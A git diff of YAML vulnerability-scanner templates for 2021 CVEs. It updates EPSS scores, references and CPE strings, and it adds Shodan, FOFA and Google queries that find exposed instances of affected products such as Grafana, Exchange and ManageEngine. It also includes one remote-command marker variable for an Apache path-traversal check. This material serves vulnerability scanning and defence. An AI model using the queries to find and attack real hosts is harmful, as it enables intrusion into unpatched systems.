https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41291 cwe-id: CWE-22 - epss-score: 0.03741 - epss-percentile: 0.90901 + epss-score: 0.02626 + epss-percentile: 0.90324 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 9b96cd6fbc..26295accf6 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 - epss-score: 0.05376 - epss-percentile: 0.92942 + epss-score: 0.02626 + epss-percentile: 0.90324 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index f62f548ae5..94a0c387f6 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: microsoft product: exchange_server + shodan-query: vuln:cve-2021-26855 + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve,cve2021,xss,microsoft,exchange http: diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 4f48226efe..270f84d39a 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00067 - epss-percentile: 0.27705 + epss-percentile: 0.29279 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.html:"Flatpress" + fofa-query: body="flatpress" tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive http: diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index d08a056cb2..0c64e4d407 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -13,13 +13,15 @@ info: - https://github.com/hjue/JustWriting/issues/106 - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 - https://github.com/hjue/JustWriting/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-41467 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.48289 + epss-score: 0.00136 + epss-percentile: 0.48885 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 27865f7693..bcc7fd4486 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -13,13 +13,15 @@ info: - https://github.com/MobiusBinary/CVE-2021-41649 - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/Offensive-Penetration-Security/OPSEC-Hall-of-fame classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 - epss-score: 0.03607 - epss-percentile: 0.90729 + epss-score: 0.08507 + epss-percentile: 0.94431 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index e780e85cb8..6d03f016d1 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41749 cwe-id: CWE-94 - epss-score: 0.52531 - epss-percentile: 0.97293 + epss-score: 0.51305 + epss-percentile: 0.97555 cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 599a58daa6..481c71c2ea 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: gitlab product: gitlab + shodan-query: cpe:"cpe:2.3:a:gitlab:gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,api,graphql,enum,unauth http: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 50fc4f78a2..da6933c6d4 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41951 cwe-id: CWE-79 - epss-score: 0.74322 - epss-percentile: 0.9805 + epss-score: 0.7541 + epss-percentile: 0.98159 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index e366e89f18..fb6c1c2b29 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -28,6 +28,7 @@ info: max-request: 3 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev variables: cmd: "echo 31024-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 8a99b75474..7eee17aab2 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -30,6 +30,7 @@ info: product: knowledge_warehouse shodan-query: http.favicon.hash:-266008933 zoomeye-query: +app:"SAP NetWeaver Application Server httpd + fofa-query: icon_hash=-266008933 tags: cve2021,cve,sap,xss,seclists,packetstorm http: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index b153f30f63..27f3f94f59 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -27,6 +27,8 @@ info: vendor: sitecore product: experience_platform shodan-query: http.title:"SiteCore" + fofa-query: title="sitecore" + google-query: intitle:"sitecore" tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev http: diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index 8857080df8..9c49827e34 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42565 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.40517 + epss-score: 0.00106 + epss-percentile: 0.43259 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 554e72e8c1..4c53bc0282 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42566 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.40517 + epss-score: 0.00106 + epss-percentile: 0.43259 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 15b73b825b..2741769864 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.25981 - epss-percentile: 0.96613 + epss-percentile: 0.96712 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apereo product: central_authentication_service shodan-query: http.title:'CAS - Central Authentication Service' + fofa-query: title='cas - central authentication service' + google-query: intitle:'cas - central authentication service' tags: cve2021,cve,apereo,xss,cas http: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 427b212260..c510465710 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -20,14 +20,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42627 - epss-score: 0.16383 - epss-percentile: 0.95867 - cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* + epss-score: 0.23452 + epss-percentile: 0.96557 + cpe: cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dlink - product: dir-615_firmware + product: dir-615 shodan-query: http.title:"Roteador Wireless" tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index 9f259c8513..f6d76339b5 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2021-42887 cwe-id: CWE-287 epss-score: 0.08034 - epss-percentile: 0.9414 + epss-percentile: 0.94287 cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* metadata: max-request: 2 vendor: totolink product: ex1200t_firmware shodan-query: title:"TOTOLINK" + fofa-query: title="totolink" + google-query: intitle:"totolink" tags: cve2021,cve,totolink,auth-bypass,router http: diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 9528b0ce66..99af1b861a 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: fortinet product: fortimail + fofa-query: title="fortimail" + shodan-query: http.title:"fortimail" + google-query: intitle:"fortimail" tags: cve,cve2021,fortimail,xss,fortinet,edb http: diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 57168e57b4..3e38714fe2 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -27,6 +27,8 @@ info: vendor: thoughtworks product: gocd shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + fofa-query: title="create a pipeline - go" html:"gocd version" + google-query: intitle:"create a pipeline - go" html:"gocd version" tags: cve2021,cve,go,lfi,gocd,thoughtworks http: diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index b25b9eeda6..bd276d57db 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 - epss-score: 0.06629 - epss-percentile: 0.93651 + epss-score: 0.05253 + epss-percentile: 0.93023 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 0b03ad31a3..0ecff67cdb 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -12,13 +12,16 @@ info: reference: - https://github.com/varun-suresh/Clustering/issues/12 - https://nvd.nist.gov/vuln/detail/CVE-2021-43496 + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + - https://github.com/apif-review/APIF_tool_2024 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43496 cwe-id: CWE-22 - epss-score: 0.03503 - epss-percentile: 0.90603 + epss-score: 0.02502 + epss-percentile: 0.90106 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index f0eeb1df1e..1ddd5fcb17 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-43510 cwe-id: CWE-89 epss-score: 0.03977 - epss-percentile: 0.9183 + epss-percentile: 0.92014 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 0cb6385c90..fa5d8ee81e 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.00132 - epss-percentile: 0.47351 + epss-percentile: 0.48231 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: atmail product: atmail shodan-query: http.html:"Powered by Atmail" + fofa-query: body="powered by atmail" tags: cve2021,cve,atmail,xss http: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 328d5008cb..b28dd57297 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,unauth,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index cbd7d46ca1..1ecbf05be4 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43734 cwe-id: CWE-22 - epss-score: 0.01491 - epss-percentile: 0.85503 + epss-score: 0.00856 + epss-percentile: 0.82223 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve2021,cve,kkfileview,traversal,lfi,keking http: diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index f63e0ce1c9..b3a453604c 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43778 cwe-id: CWE-22 - epss-score: 0.53541 - epss-percentile: 0.97558 + epss-score: 0.59414 + epss-percentile: 0.97756 cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 7e0ba71aa8..225c8a64e7 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -28,6 +28,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,packetstorm,grafana,lfi http: diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 8b70a29e0c..b191ba1008 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43810 cwe-id: CWE-79 - epss-score: 0.00369 - epss-percentile: 0.72044 + epss-score: 0.00396 + epss-percentile: 0.73393 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 7353160d48..0c62873beb 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_servicedesk_plus + shodan-query: http.title:"manageengine servicedesk plus" + fofa-query: title="manageengine servicedesk plus" + google-query: intitle:"manageengine servicedesk plus" tags: cve2021,cve,rce,kev,msf,zoho,manageengine,zohocorp http: diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 7b9c396b20..40f7fdc4c0 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -27,6 +27,7 @@ info: vendor: caucho product: resin shodan-query: html:"Resin" + fofa-query: body="resin" tags: cve2021,cve,resin,caucho,lfi http: diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 99c8f046f5..0447b37050 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -25,6 +25,8 @@ info: vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" + fofa-query: title="sentinel dashboard" + google-query: intitle:"sentinel dashboard" tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp http: diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index bb870b65a1..4bd251ef2b 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -31,6 +31,7 @@ info: product: reprise_license_manager shodan-query: http.html:"Reprise License Manager" google-query: inurl:"/goforms/menu" + fofa-query: body="reprise license manager" tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware http: diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 781410683c..59dd52d4bf 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-20,CWE-917 - epss-score: 0.97453 - epss-percentile: 0.99942 + epss-score: 0.97559 + epss-percentile: 0.99998 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index c455733b0c..a4e3199f66 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 - epss-score: 0.03844 - epss-percentile: 0.91709 + epss-score: 0.04431 + epss-percentile: 0.92396 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 2ef89c22a9..cb07051a21 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -13,13 +13,15 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 - epss-score: 0.00518 - epss-percentile: 0.74232 + epss-score: 0.0058 + epss-percentile: 0.78015 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +29,7 @@ info: vendor: apache product: superset shodan-query: http.favicon.hash:1582430156 + fofa-query: body="apache superset" tags: cve2021,cve,apache,superset,default-login http: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index ee675dcc14..2b65a83f4b 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_desktop_central + shodan-query: http.title:"manageengine desktop central 10" + fofa-query: title="manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp http: diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index e17fc811d7..806752d520 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: rubyonrails product: rails + shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve2021,cve,seclists,redirect,rubyonrails http: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index f5532462d1..5ff5f61408 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44529 cwe-id: CWE-94 - epss-score: 0.95621 - epss-percentile: 0.99362 + epss-score: 0.97096 + epss-percentile: 0.99778 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: endpoint_manager_cloud_services_appliance shodan-query: title:"LANDesk(R) Cloud Services Appliance" - tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm + fofa-query: title="landesk(r) cloud services appliance" + google-query: intitle:"landesk(r) cloud services appliance" + tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index ce50ce6618..368146cdc7 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui + shodan-query: http.title:"thinfinity virtualui" + fofa-query: title="thinfinity virtualui" + google-query: intitle:"thinfinity virtualui" tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft http: diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 9f2422fa80..5fc3d34144 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2021-45043 cwe-id: CWE-22 epss-score: 0.05404 - epss-percentile: 0.92404 + epss-percentile: 0.93125 cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hd-network_real-time_monitoring_system_project product: hd-network_real-time_monitoring_system google-query: intitle:"HD-Network Real-time Monitoring System V2.0" + shodan-query: http.title:"hd-network real-time monitoring system v2.0" + fofa-query: title="hd-network real-time monitoring system v2.0" tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project http: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 8e19ad446d..51c20778b8 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -19,14 +19,15 @@ info: cvss-score: 9 cve-id: CVE-2021-45046 cwe-id: CWE-917 - epss-score: 0.9741 - epss-percentile: 0.99904 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: log4j tags: cve2021,cve,rce,oast,log4j,injection,kev,apache + http: - raw: - | diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index e7481e67c4..567d6543ce 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2021-45092 cwe-id: CWE-74 epss-score: 0.05776 - epss-percentile: 0.93213 + epss-percentile: 0.93361 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui + shodan-query: http.title:"thinfinity virtualui" + fofa-query: title="thinfinity virtualui" + google-query: intitle:"thinfinity virtualui" tags: cve2021,cve,packetstorm,iframe,thinfinity,tenable,injection,cybelesoft http: diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 1443bab6f0..e2b4786a79 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45232 cwe-id: CWE-306 - epss-score: 0.97202 - epss-percentile: 0.99785 + epss-score: 0.97214 + epss-percentile: 0.9983 cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index a0fe57ff5f..c01d93a1ec 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -20,13 +20,14 @@ info: cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.00314 - epss-percentile: 0.69628 + epss-percentile: 0.70155 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appcms product: appcms shodan-query: http.html:"Powerd by AppCMS" + fofa-query: body="powerd by appcms" tags: cve2021,cve,appcms,xss http: diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 67898a4361..51e22bf04a 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -30,6 +30,8 @@ info: vendor: reprisesoftware product: reprise_license_manager shodan-query: http.html:"Reprise License" + fofa-query: body="reprise license manager" + google-query: inurl:"/goforms/menu" tags: cve2021,cve,reprise,xss,seclists,reprisesoftware http: diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 8b2a48eadd..8df5882955 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 - epss-score: 0.08441 - epss-percentile: 0.94265 - cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* + epss-score: 0.07905 + epss-percentile: 0.94241 + cpe: cpe:2.3:h:telesquare:tlr-2005ksh:-:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: telesquare - product: tlr-2005ksh_firmware + product: tlr-2005ksh shodan-query: http.html:"TLR-2005KSH" tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index c60518bae1..1ebc42dac4 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-45968 cwe-id: CWE-918 - epss-score: 0.01877 - epss-percentile: 0.87173 + epss-score: 0.01712 + epss-percentile: 0.87786 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index a3b0e982d7..f9a8f5f135 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -13,18 +13,22 @@ info: - https://www.exploit-db.com/exploits/49546 - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 - https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 